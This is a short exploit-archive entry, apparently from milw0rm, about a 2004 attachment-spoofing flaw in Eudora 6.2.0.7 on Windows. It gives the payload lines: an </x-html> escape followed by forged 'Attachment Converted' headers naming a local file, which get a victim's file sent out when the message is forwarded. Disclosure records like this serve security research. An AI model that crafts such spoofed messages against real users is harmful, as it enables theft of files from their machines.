vendor:
Eudora
by:
milw0rm.com
5.5
CVSS
MEDIUM
Spoofing
CWE
Product Name: Eudora
Affected Version From: Eudora 6.2.0.7
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Windows
2004
Eudora 6.2.0.7 on Windows spoof
With spoofed attachments, we could 'steal' files (after a warning?) if the message was forwarded (not replied to). Within text/html part, use </x-html> to get back to plaintext, no need for NUL or linebreak or nothing: </x-html>. Attachment Converted=00: "c:winntsystem32calc.exe". Attachment Converted=: "c:winntsystem32calc.exe". Attachment Converted: "c:winntsystem32calc.exe"